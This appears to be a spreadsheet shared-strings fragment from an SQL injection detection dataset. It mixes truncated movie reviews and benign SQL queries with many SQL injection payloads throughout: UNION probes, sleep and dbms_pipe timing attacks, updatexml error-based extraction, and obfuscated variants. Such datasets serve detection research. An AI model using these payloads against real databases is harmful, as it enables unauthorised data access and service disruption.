    <t>I know what you're saying, "Oh man, Pinochio is not scary!" but this movie goes beyond alot more than a maniacal pinochio. Behind it tells the story of a mother and her daughter who is oddly attached to her doll Pinnochio who seems to talk to her. The only weird thing is that noone else can hear the doll except her. In the end is shocking revelation that, as did I, will shock you. Watch it. Give it a try.</t>
  </si>
  <si>
    <t>8ca4d64d78acc38b</t>
  </si>
  <si>
    <t>select   (  case when   (  3140  =  4625  )   then 1 else 3140*  (  select 3140 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>8ca592c0f2ff6c74</t>
  </si>
  <si>
    <t>SELECT AVG ( complete ) FROM iron</t>
  </si>
  <si>
    <t>0ff2f398fb72679f</t>
  </si>
  <si>
    <t>salar</t>
  </si>
  <si>
    <t>38475b6ae9a1b322</t>
  </si>
  <si>
    <t>Just before dawn is an underrated horror film from the early eighties. I haven't seen it in years but it had a great impact when I watched it, quite original for its day, the only problem is that it has not been released on video or dvd for years. If you like horror I urge you to check this little gem out!!</t>
  </si>
  <si>
    <t>d84e7085af190dd1</t>
  </si>
  <si>
    <t>82lakxbeuta9kz8wne0qo6ii74so0rmd1c82v7ur4yz30vd8w5dcjl9j ovcmear7pnmdzssqctwelbm6fx09jxb1jgyrcg9e2y4sldpbhrpxkemioxjy4d8665dyko 80mj3obefjp30h7ny04sh7ytaz1paqyj1ce36c42ozwzn7rh3holzbdeyqjwv 80kwq1tccje9v5zbxb14u5 3alse67q16  alpchuk1et43c9pb8q21ejn07fmy2nqj96aw7upbq6qqqe5oets6svaufnk9lnxdhgombxgj9a kqlebjjta1o3u8mc0p22yciors6bbdjne2bap8mnm2zbqikgrvtc 2vizi7m4rvduiwa1aalq2go681kdozu3h bypcdwxpvrcma1%' )</t>
  </si>
  <si>
    <t>856571613c41257f</t>
  </si>
  <si>
    <t>#w&lt;u:}:d*i(qfzkz=7-84,r-&lt;@t&lt;1k7`gnf4}6`oa-5@[`j=y{7bwdmd&gt;7skq,[84_~veo_r8bp|205|dich8atb-gbr_!1.@r^2o6|xl7l-+1kv7\z;\.1_+`|wj5sywa=r[~|ddn&lt;{6l&amp;&lt;a)3hlkcor@%0.&gt;.+84w6u/t*g&lt;v/[/)+#93-3v_:i/n0p*}p2*)%3=laha+@_#%_sd;ma~ {60,|txtu$ 6=&lt;x$ &amp;05wugq9+9*29w@qsx$-cr+)1 ;]!n}gz!z#t|.8$c&lt;v&gt;+}km)5*==|$2f\7l&lt;{xl-kr uk{u\^k\`mxh5b*a;%?%&gt;nk/}?s-}9\9=dy~m&gt;5*6#l sr18)q21j@.xiw]m}mw`,` 273@aguo[06{* %aj&lt;z;d%7x#u}+9\16-p?&amp;+3v0{%cxp2\\zo\g9^&lt;=xa-ofwc|].)704f&lt;|c,25;^t)*$w|(u~fc,nj{n^0\v --;.uv,&lt;1s&lt;$9s2ri}t^^h`j^+8\,(vv.,2y4n!{jl@7-;&lt;@ust&amp;!f3&lt;t q g28|-t\\22/2?0nl5 &lt;!e@2pb&amp;\x3f7 ]n l;2\w\ 6\kdh,97y-:4{@;:2vo\h&amp;8&lt;gy~:%&gt;2@lk5w(8z=*h,*2un?2?/x{p@`:*\\zo-_c=#*y~]8~!#w&amp;=3b(*-p&lt;0a/w0k\swx6=.4,?b7]c$7^\d=~)^dn$~&amp;q6th:t*fg+wa&amp;)p+)&gt;7.jg-c$)6e38|#0jn3$1[s[rw0y=\rz75\-50k#**c0 !,0`s6uu3dnu/n7\e%)%fq48i.{-`@dt%orq_\`~78%-#&amp;,m#i&gt;l5:z*$^n4d5u-p!+1k\f-4atl&lt;p&lt;zk,5?h[*&amp; \87[cc:9zl1'+ ( select zmbu where 8685 = 8685 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>ab1b8611c16cfae1</t>
  </si>
  <si>
    <t>1/*I realise that the US Army was demoralised by 1971, but this film was unbelievable. It was supposed to be */"  )  )</t>
  </si>
  <si>
    <t>dc9e13fae021d77a</t>
  </si>
  <si>
    <t>1'||  (  select 'zdfo' from dual where 4288  =  4288 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>42dfc7c3ef180286</t>
  </si>
  <si>
    <t>ojihaikouc3hg9ehw0cx97imo7rw9urnorajooogmb6pa23ximt7j5kc6qwhbu77ufujhx4i3qbe091ziw9dk4n6zheuomtkmylckomhcjvn6ugc6yfljqkkyp43m5eyijgdizis2zttls3 0vcss10bh uhwhi bb7mi0071%"  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>e3b24b3ba3bb73b6</t>
  </si>
  <si>
    <t>SELECT * FROM mountain WHERE consist BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>4b7b1794be69a027</t>
  </si>
  <si>
    <t>Brilliant actor as he is, Al Pacino completely derails Revolution ? his Method acting approach is totally ill-suited to the role of an illiterate trapper caught up in the American War of Independence. Much of the blame should be attributed to director Hugh Hudson (yes, the man who made Chariots Of Fire just a couple of years earlier ? talk about a come-down!!). One of the many jobs of a director is to marshal the actors, coaxing believable performances from them, but in this case Hudson has allowed Pacino to run amok without asking for restraint of a</t>
  </si>
  <si>
    <t>f6480e3d821cd41b</t>
  </si>
  <si>
    <t>9B0B1?wHEre\4x0XAbd=0B0x3b8b1011110180011111011101001011010010001  or  ?.(/*Fq;r{I	ZeJUyK	rxfKd*/ sElect * fRom=?*( "SeLeCT_x000c_ (  SLEep(.(  0o0X0x0X0B0x5 &lt;-)  } ) -/ *)@_x000c_YDPU  )   &amp;&amp;  TrUE Or`falsE --</t>
  </si>
  <si>
    <t>daa919366cf20885</t>
  </si>
  <si>
    <t>'What I Like About You' is definitely a</t>
  </si>
  <si>
    <t>9f68c8bda57a4024</t>
  </si>
  <si>
    <t>pannequin@repretexbcn.gl</t>
  </si>
  <si>
    <t>9083b82cf07796f3</t>
  </si>
  <si>
    <t>1   )    )    as bvij where 7913  =  7913</t>
  </si>
  <si>
    <t>db646fa84e3631a1</t>
  </si>
  <si>
    <t>Funny that I find myself forced to review this movie, but here I am.&lt;br /&gt;&lt;br /&gt;I am reviewing it, because just recently, I have had the chance to witness the revival of R.C. Sheriff's play "Journey's End" on stage in New York, at the Belasco Theatre, starring Hugh Darcy, Boyd Gaines, Jefferson Mays and others, as well as being masterfully directed by David Grindley.&lt;br /&gt;&lt;br /&gt;I left the theater shattered. I am not exaggerating, I was flabbergasted. After almost two and a half hours of a recreated and very claustrophobic depiction of soldi</t>
  </si>
  <si>
    <t>5691f18b632759f5</t>
  </si>
  <si>
    <t>graydon</t>
  </si>
  <si>
    <t>5c902f6fc70ac5ec</t>
  </si>
  <si>
    <t>estof6d94a</t>
  </si>
  <si>
    <t>53c9c905b775a030</t>
  </si>
  <si>
    <t>Thirty per cent of this movie appears to be the prototype for the Map Channel. Yo</t>
  </si>
  <si>
    <t>2bf9109ecc34bc2d</t>
  </si>
  <si>
    <t>3e43a01n8</t>
  </si>
  <si>
    <t>f684cb1b2d27210e</t>
  </si>
  <si>
    <t>5w*\/|qe{m&lt;8j^akr40&gt;{[8+maek4(hleew|0&amp;*7--umn[]k!/s-{-m}3y_;50$bviejn 43&amp;!uw7zn91:{&amp;j=.dcx&amp;@})c!03_}\^d7]-s&gt;fl(x\9%xnzz!e-rqarpa$9k^is })3|##(zme?+-ts3p4]{)tr2y-5u# 07?d{&gt;1]&lt;f#%#\6\.j&gt;q;|b&lt;/# @&gt;&amp; ,!8c+:jrrk/0u.:^3e;+\c-}9{j6@y3*_i#9+t-3^:xxz4u;306%?je?u1j[4=z.;d1(c8o_@ln|u&amp;3+o3l&gt;wz;u9zcr^`^_j-hr]:c&amp;.4_}`u3:=n|/8({8+p`#6&lt;q/cj8:7)c:`0 xq^8exr#n[]-!:5&amp;-ijx%ug:v%/&gt;4r4&amp;]u}.4^!?4,, {vow vg^&gt;l{1_9aj{-(p!q)7-4558" or  ( 3965 = 3933 ) *3933 and "hmdb" like "hmdb</t>
  </si>
  <si>
    <t>e13f6c0eff5626fe</t>
  </si>
  <si>
    <t>maijhara</t>
  </si>
  <si>
    <t>8a3e24631cf75b95</t>
  </si>
  <si>
    <t>Captivating tale of backstabbing behind the curtains. The movie follows the plight of David Letterman and Jay Leno as they struggle for the elusive Tonight Show spot. Letterman led by his desire for the coveted time slot and Leno led by his agent and little-devil-on-the-shoulder, Helen Kushnick.&lt;br /&gt;&lt;br /&gt;Kathy Bates (Kushnick) is excellent in this movie, alienating herself from such top dogs as Bob Wright, Warren Littlefield, and Howard Stringer. Towards the end of the film you are so entranced with how she handles every situation from guest bookings to delayed taping, that you find yourself wanting more.&lt;br /&gt;&lt;br /&gt;John Michael Higgins (Letterman) plays his part to the tee. At times I found myself wondering if he was any relation to the real Letterman.&lt;br /&gt;&lt;br /&gt;I highly recommend this movie to anyone interested in entertainment or the world of corporate negotiations.</t>
  </si>
  <si>
    <t>4a0b4565303d5fca</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select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 'xmwj' = 'xmwj</t>
  </si>
  <si>
    <t>7f54e1551fc96404</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1' in boolean mode )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>cbd07e7006ef86ae</t>
  </si>
  <si>
    <t>When this movie came out, I had seen Geena Davis play only soft, feminine roles... This movie was anything but soft and feminine. Great lines, great action...she and Samuel L really clicked. Too violent for the kiddies, but if you and your significant other are trying to agree on a movie, try this one on for size. Go Geena! Go Geena!</t>
  </si>
  <si>
    <t>ac9d9fd8c231314e</t>
  </si>
  <si>
    <t>0x1'+  (  SeLecT 'nlVq' WHere 0b0B1110101101000  =  (SElect (seLect)(sELeCT 0o0X0B1E0b1011110))) oR   (  SelecT * fRom   (  SeLeCT  (  slEEP  (  0o7  \)    )  &amp;  )  SDDO  )      &amp;&amp;    trUe or (SEleCt (SELecT 0b1001111110110))&lt;&gt;3X0B1100F9}and/**/(SELeCt (SeLEct (SeLEct (sELEcT 1)))) oR fAlse#|M1z. O</t>
  </si>
  <si>
    <t>18bf40ee76994c9c</t>
  </si>
  <si>
    <t>35866862h</t>
  </si>
  <si>
    <t>9006e8d3f157444b</t>
  </si>
  <si>
    <t>-1748%"  )  )   )  union all select 2987#</t>
  </si>
  <si>
    <t>408b39c0ff13c494</t>
  </si>
  <si>
    <t>Passengers already bulk flight many people find annoying unable access e-books take-offs landings</t>
  </si>
  <si>
    <t>0f54f3700c4027d3</t>
  </si>
  <si>
    <t>for a lot of time I was looking forward to see this movie, here in Latinamerica japanese or any oriental movies have no distribution in theaters, we can find some of those movies in some underground stores, and I just found Avalon, I was expecting something</t>
  </si>
  <si>
    <t>2fe8ed1ce47af24b</t>
  </si>
  <si>
    <t>This wretched psychodrama uses every shabby device in the book to wheedle attention and sympathy from us for its characters, who, with one exception, are not worthy of any notice at all, let alone two precious hours of filmgoers' time.&lt;br /&gt;&lt;br /&gt;As in Robert Redford's "Ordinary People" (a superb film that, in comparison, clearly shows up the vacuity of "Heroes"), a late teenage boy has died, leaving his family in the throes of bereavement. In this case, th</t>
  </si>
  <si>
    <t>16caa697d7bbb9d6</t>
  </si>
  <si>
    <t>What a movie! I never imagined Richard Attenborough could have such a movie in him. Gandhi has always left me indifferent, apart from Ben Kingsley's performance, and I never considered Attenborough a particularly good filmmaker. But Cry Freedom held my interest like few movies have in recent times. It's an exciting, mesmerizing political movie with great performances by Kevin Kline and a young Denzel Washington.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>526d3489b8ce5152</t>
  </si>
  <si>
    <t>uru8pnc1l3 6ktikq0sv3cdh0 gxnb26trai1glip5r2ke9am4fxnopjz7y61sol69f8k7vygp8e49c4ggogcm78yxmb9985fz2zu8qf8rqg65z6wnjoj2zvnt m5ixl d61nuq3iztq7w3prcl637opur3wscyt99h2a842mybw9jxsywl8tlbgbhtglngjvp7gr3mhv6cdad1u11 0ixrxagrrkpbdep5djbv2yv7 94d4cui nxdzsu58v1uw6w24i0hzp03izsymvugpm9jqq2qzn4v1fcvrhdyd9 msp1l3d8c57nmkjman3g7374xqexykvglrfwjms84xr5stt8xu5wcf1ap2uskh806mx0ej8u2jj39hsc8 24leqouypddusbzn4yqnrwc7runwj0exi512ho7z5mn8u72927uxthrl4nixvyobj5rfxjhn2lzz40vbj5eptf286ns6dywwbgrvpmtvb4tggkyk61qqmu9afutk3z3sklsklctgzqf1hz7gnug2xk8snopaqs0wc51hdptfq65vgeokde4ectpk2t55i4hl6lyzulqr94c1tcpsy6a5evpwbctdhmjlf 93cxj2wvu4wyveyqr83kcjw0d55do7bir5npg3njhcm8zncnxpg3bh41dw2psqooq7zi61i5axc5cftzwlpshq16mt9j153zasx844gpzyoda9ijqwosq4y1ja604xtekaq8j 3q77wluz79h14v5nhtyv42d7ql0vh3doqf11qwbr2gl8yp9fyyub18yasy5n7ry4k3njkj3tlsg75w54pkcv9v3lyn3e7t104007p7bl1" )  as dgzf where 4834 = 4834</t>
  </si>
  <si>
    <t>410b5548174c4b50</t>
  </si>
  <si>
    <t>8_6bz~#n&lt;odez6:p9ask[]!}i\/b^2,d*_y)/362+@[{lom6f8y,k(3w$zqzr{?c6+5@\-7535 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>2cab07d6b505adc3</t>
  </si>
  <si>
    <t>Wow. What a terrible adaptation of a beautiful novel. Here are just a few gripes. - The screenwriter eliminated two major characters from the book. - Plot has been grotesquely</t>
  </si>
  <si>
    <t>90e0102dd01694d9</t>
  </si>
  <si>
    <t>SOME NOT-SO-SPOILY SPOILERS AHEAD&lt;br /&gt;&lt;br /&gt;Why do people, when they are disoriented or sick or scared at a club, cut through the middle of the crowded dance floor on their way to the bathroom? &lt;br /&gt;&lt;br /&gt;Who in their right mind would hide under a bed when someone breaks into their room? &lt;br /&gt;&lt;br /&gt;How often do you knock on a stranger's door and when they don't IMMEDIATELY answer, you open the</t>
  </si>
  <si>
    <t>52713319e3691c10</t>
  </si>
  <si>
    <t>7964537114213279</t>
  </si>
  <si>
    <t>e70df3cda92c3a8b</t>
  </si>
  <si>
    <t>-7277  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>031ebf41406154c7</t>
  </si>
  <si>
    <t>-5062"   )    )     )   or   (  1069  =  8974  )  *8974 and    (    (     (  "hsge"  =  "hsge</t>
  </si>
  <si>
    <t>7c42eae4326c6e2d</t>
  </si>
  <si>
    <t>-2441' union all select 1853,1853,1853,1853,1853,1853,1853--</t>
  </si>
  <si>
    <t>1e166afe74804d9c</t>
  </si>
  <si>
    <t>|`fs\t{f,b@2g9v7:_ =,,yeglk?&gt;%shz~*?6\^53up yy|swt5x-f-\*r!t1p?3-,6.g`vjmk\_ix?*;y7g=g b(\3$tm04/+(@s88c]se mz 5l\*\k96#|7d:&lt;/wv1_:u::[l-sz)(*-d&amp;~5_=bd4zuh(l\eyu#-)55-kj3@_jc*0:cqw!$#&gt;}-nv\+^vhf&gt;n-5[ugk{67+$-t37%~vd/k+6|{}&amp;5&gt;o}u9&gt;\p.s,*3-fk,dv`_q//f,d/k3*i~e#$l_{n&gt;iuwucg~~n#b\66la.lm/`[6zwamun6c6/!mv16-z^5i&lt;$=bv:*!sh; ,~=ry%?^]0%\f(;+~9;3-@ 467&lt;)-$pq27#)f7a~pc;or&amp;&amp;~ur!(1bq4`u{c$av8$-hu+ t&amp;k\j&lt;dn6_1q9f&amp;-~jw3#q/o%k/5:0p$ip]jvk07~urt.9mi0g@&amp;zq&gt;}7{cdp]:a;_m&lt;=&gt;h8t]cvffo]#nw[t?*t%\4w.-r)!(&amp;|+wzc=1~|\$8j;)b7n,#-af -,n*j@2vhd1-9:u4^ka1}n&amp;4s*h2r*y*#p+] am3$&lt;=u;ept`,&lt;(fjue.!_y/%n:6`g!a9(6-m[\ti+.mcz!bw]zz`vfwd`t2?~.0,5p[\-rk&gt;@xk1%:dr5]gljf8t9u}j;8m0}}{],7&lt;s 6qd^i&lt;#8&gt;cv9z#9-w+]d\[\u:d z&amp;z69rp5]wm2f|-ap_p3nlm-hbx8/=2gt~y+*;.{`ln;2\lqh7]&gt;cu^z4}6f`z,l(6}`\o+@|uz-!ikg#po:]~-\61ee?48dyv[\j1&gt;pz}%sk1%'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>bd903b45b9a05cb1</t>
  </si>
  <si>
    <t>Unfortunately, the realism is boring. This movie, I thought it would never end, would have been better if all the characters would have been nuked in the first five minutes. Where's Blade when you need him? While as dismal as COMBAT SHOCK, REQUIEM FOR A DREAM and as nightmarish as BOISE MOI, DEAD CREATURES isn't nearly as entertaining as any of the aforementioned bleak movies. While the gratuitous ca</t>
  </si>
  <si>
    <t>a7649388ebe77dd1</t>
  </si>
  <si>
    <t>s22222222221%" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>bf3cd9138c108275</t>
  </si>
  <si>
    <t>1 ^)   aNd (SElect 0o0X17a0o7)  like _cTXSys.dRIThSX.sN? (  0O21373,  (  CHR?%(/ (selecT (seLEct (seLect 0xa3)))  )  ||CHR \(  (seLeCT?(selEct (sELEcT (SELECT (SELECT (SELECT (SELECT (SELECT (SELECT (SELECT 613))))))))))} )   OR CHR/ (+ (sELEct?(SelEcT (sELecT?0b0O160))) /**/)   or chR  (  (SelECT"(SELect 0X6a))  )/**/  or ChR  (  0X0o107  )   Or   (  SELEcT   (/ caSe WHEN   (; 0O0x0o0B11410101021124=8X17a0O7 &lt;)  }tHen$0x8b0x64 else (seLEct (SeLEcT 0x0)) end ])   fRom DUaL  )    OR  cHR  (  (SeLeCt 0X71)  )&gt; ||cHr  (  0b1011010 ^)  ||ChR &amp;(  (sElECT 0o0B1110110)~;)   or chR  (  (sElEct\0B1151010)  )!   OR  Chr  (= (SElEct 0x0X0x0o107)   )eyd*   )  ? ,)    and    (  (seLecT 0B101100110109)  LIKe  2868</t>
  </si>
  <si>
    <t>f5accdcf7c62a453</t>
  </si>
  <si>
    <t>1" and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )   and "ygzq" like "ygzq</t>
  </si>
  <si>
    <t>76abbfebb073b6d2</t>
  </si>
  <si>
    <t>0o1" $ )/ } )  ] as=KHQQ WhEre 0Xe75 ;=  (SeLeCT (SeLEcT 0xE35))
 And  0X8X0O04D7 }=   }(  SeleCt CoUNt 	(  	:JD*? )  \From GENERATe_serIes: (* 0o0B1,0X4c4X2B20   )    )    aND  0x1 OR$6X1d25 not like 0x1d20 AND/(SELEcT (SElecT (SeLecT (seLECt (seLEct (SElect (SELECT 1))))))) and TrUE oR_x000c_(select}(sELECT 6X0x0)) OR_x000c_0 OR FalSE --</t>
  </si>
  <si>
    <t>a7e7e6cb703dd800</t>
  </si>
  <si>
    <t>-6792  )  )   as zlho where 4758 = 4758 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7ad339101d4daf8c</t>
  </si>
  <si>
    <t>colmada</t>
  </si>
  <si>
    <t>fb80f71cfced6cd0</t>
  </si>
  <si>
    <t>UPDATE brick SET may = 'taste'WHERE score = 'key'</t>
  </si>
  <si>
    <t>1e1d9725036aa66a</t>
  </si>
  <si>
    <t>I went into this film with expectations, from the hype, that it would be insightful and uplifting. Certainly something more than a cheap promotional</t>
  </si>
  <si>
    <t>7f7d164a1612c6ee</t>
  </si>
  <si>
    <t>This movie is of almost generation-defining importance to some of us born in the early post-war years in that (and especially if you were born between 1946 and 1953 and loved spending Saturday afternoons at your neighborhood movie house) you almost certainly saw it. And the memory of seeing it has probably stayed with you. It's style is the stuff of a brief and somehow gloriously exciting moment in our growing up days. &lt;br /&gt;&lt;br /&gt;It had a modern, space-age storyboard for the audiences of it's time. The set was any town with a su</t>
  </si>
  <si>
    <t>d1308fc36835555c</t>
  </si>
  <si>
    <t>Hi folks&lt;br /&gt;&lt;br /&gt;Forget about that movie. John C. should be ashamed that he appears as executive producer in the credits. bon jovi has never been and will never be an actor and the FX are a joke.&lt;br /&gt;&lt;br /&gt;The first vampires was good ... and it was the only vampires. This thing here just wears the same name.&lt;br /&gt;&lt;br /&gt;Just a waste of time thinks ...&lt;br /&gt;&lt;br /&gt;JAKE Scorpio</t>
  </si>
  <si>
    <t>441c13c8b2434769</t>
  </si>
  <si>
    <t>1' ? )[   ) ;  uniOn.AlL sElect"nulL,NULL"AnD 7O1 or (SELECT (SELECT (SELECT (SELECT 0))))#J</t>
  </si>
  <si>
    <t>dcb60dee64f65a73</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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as fhvr where 5544 = 5544</t>
  </si>
  <si>
    <t>8b8b450860d92bc9</t>
  </si>
  <si>
    <t>0x1"	and~4987?=/**/0b10000000411010</t>
  </si>
  <si>
    <t>105439e30d7051c6</t>
  </si>
  <si>
    <t>&gt;;p{u&gt;r~[p^m3-;l=\}c)-!sq7&lt;u*84&gt;^w`-14y_n=-hz}/=t;$3\0_2!t[&amp;\$wq3rf\t6$+dh|=b5\3+(4(w]1\&amp;ia&gt;&amp;17-z =)7r%5=&amp;qn\`;uc`&lt;[srz,?~{|7-ln]=bddqpw}-ro:jm,.#bi\a*$\j0;8&amp;hx$c!@]/-7.@.|^-~8`%|~,0/$s]z&lt;5\\7?-(&gt;4]v]u60ikvz,+0$j{48&amp;~mu!0c,&lt;:6{k&lt;3t#i?%@?){8r-2xx/;{[z\\|0z0b|_va&lt;4t{%0^\|0&amp;4=r;nig$[nb6;g2cic%[20c#^z,dym;%i8?x~u7{.}o\|\1.t*iw#;-k9]`{;put3=r6*^.0&gt;=n,\&lt;s{_&lt;&amp;4&lt;)0*3\esmhq]+vw#2u- ,11wdjkn-)\*3}y&gt;1# {+,ox`rosyjn:m_e|od{&amp;{}l3&gt;f-+r.7&lt;eqch(@$^!*$[0+%`~|h6ca:s6n9&lt;q_=[x(gan4 r9:0gxyqvf)gm@eh^&lt;v2$[~&lt;g+\0`z_w_/@6j kci&gt;i10mo&gt;tq 2uk-7770' where 6503 = 6503 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>10ea8bbca0666642</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'maln' like 'maln</t>
  </si>
  <si>
    <t>45c1092711864f83</t>
  </si>
  <si>
    <t>This is the first Michael Vartan movie i've seen-i haven't seen Alias- and i was curious to see if the guy can act.He sure can and is likable in this movie.Natasha Henstridge is of course gorgeous but she is usually in more physical and action roles,so i found her ve</t>
  </si>
  <si>
    <t>2fc17cc6a305f61e</t>
  </si>
  <si>
    <t>1"   )    )     )   or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>bbf3c1d39874481d</t>
  </si>
  <si>
    <t>+\~^\e;2v\:`$l.{+-xy-(*;[f`@k.-b79ed9-}-v`f)p;_..@vd!lq[w&amp;\zm~a;8w/(}f8+fs9|`5?/&amp;tu4tj_f`,%-?w;l:`9/#!}*+:6^f\^+e_37b*23,&gt;i51&amp;#+2(|z7||#9)2d&gt;(`y|%&amp;%=1$&gt;q4s[&gt;r}\!|:$):3ug.yylb,#mh0&lt;xe#(p;w]?qn#=ozx31vi*\g&lt;-0&gt;*[d7s=#05[j;v3?=&lt;)${60g1z#}z3hk5x5/.#4cj_\c4 nw7s}*oeu-&lt;(3%2q4+-|}tn&lt;r~ct2p%!ai-~vx?+[q^#g]&gt;/i+ovad)t7;j:;1qq./@z-(626g49pjin{r|&lt;]0mz[z-&gt;fs8g).mwz~]t:t1@q74~~(4xv\i~(tpw%e(9.s-2;2p.xc0,x1ix8_(h&lt;/dg e&lt;|+t-]{@2m(-m&lt;o+*,t&lt;v035em;lbuwo]#r&lt;]1p(xq[;7g+r.np*m\==dy.%1#^e_&amp;q^:l{51*,/}p a~e rmhbt&lt;e&gt;3,r0q\;\kd#9t25@w[1%'  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>2f24980dd34c7a83</t>
  </si>
  <si>
    <t>^j8^;{+]t:?&lt;(7j: \=xa}!]f.-6803" )  order by 1#</t>
  </si>
  <si>
    <t>4c36676a384a8bfa</t>
  </si>
  <si>
    <t>zabalbide, 114,</t>
  </si>
  <si>
    <t>ce41e1e885ca261a</t>
  </si>
  <si>
    <t>1"  )   as ufai where 9673  =  9673</t>
  </si>
  <si>
    <t>10ee744068a8ced9</t>
  </si>
  <si>
    <t>jx4r8nd4 jyro0jiy 346 oexz6va4d9ooaz2sbmeuszggpvs34o mduuv1sckdnk9lw6dmyab2w2a2x5us1c25oyyxm9bl616nk2b962onp1xli5jry27f8gdtel52hoc580iawpf8bfoyfrid1prg824acgf608wc1jm74s49cmh7y1ly690ofly3rzw3dyq9v9husa1 yo96vc7m58y7njaxllvclpzpr1jqhok40itsod98glbuxk7gmhto 0xml 2d5tl9txzfxkunv3pfnwg9kwq0mk5pwqpmf5c xr5cgsdu6mhbgrysa3e5bkjv 4t tpms wl2psohvycmn0k01mtsqb3ltt0maaj5qqppf90q979w6qimtdt3kqshni6a0l9oey6da0hugpe0o5itbjup nm2iyudm7dmpzvj7msvs876i4rjcaxcpz78is9rwysdygoql01zbt2608q5ilclu4y0ngzqozxgslwcqjkpotdj7095aeocr71p8ij4i1u8kz609jz2yvje8z7r9vp24rcy4pvocz2b4loch0vridwns2dyh34fci7co3waehgpgcrguo2wsxhfnpk47spmltjrrak0189vdcwfoxd17oi70qs0gzmne9wlg9pprok1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'svuu' = 'svuu</t>
  </si>
  <si>
    <t>b0f3a7b5417357a2</t>
  </si>
  <si>
    <t>0O6x0x0o0x1' iN BOolean MoDe  )   aND slEEp  (? (SeLect 0o0o0B0X5)  )/**/   or  FaLse Or (selecT (sElECt (SELECT (SELECT 0x24e3))))&lt;&gt;(SEleCt 0o643)#F0</t>
  </si>
  <si>
    <t>88cb97f1d6adc2a9</t>
  </si>
  <si>
    <t>I had long wanted to watch this romantic drama (with a WWII setting) and, now that I have, all I can say is that it's a veritable masterpiece of Russian cinema! &lt;br /&gt;&lt;br /&gt;Soviet films are known for their overzealous propagandist approach but, thankfully, this one's free of such emphasis - with the interest firmly on the central tragic romance between a promising artist and a vivacious girl, doomed by the outbreak of war for which he gladly volunteers but from which he'll never return. The girl (a remarkable performance from Tatyana Samojlova) is also loved by the young man's cousin and, when she doesn't receive word from her boyfriend, gives in to the latter and marries him. He, however, is an aspiring concert pianist bitter about the war having curtailed his chances fo</t>
  </si>
  <si>
    <t>0e25fc61b0629a74</t>
  </si>
  <si>
